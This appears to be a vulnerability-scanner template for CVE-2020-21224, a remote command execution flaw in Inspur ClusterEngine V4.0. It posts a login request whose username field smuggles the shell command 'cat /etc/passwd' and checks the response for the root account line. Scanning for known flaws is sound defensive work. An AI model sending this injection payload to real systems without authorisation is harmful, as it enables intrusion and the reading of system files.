id: CVE-2020-21224 info: name: Inspur ClusterEngine V4.0 RCE author: pikpikcu severity: critical reference: https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul tags: cve,cve2020,clusterengine,rce requests: - method: POST path: - '{{BaseURL}}/login.php' body: "op=login&username=;`cat /etc/passwd`&password=" matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" part: body - type: status status: - 200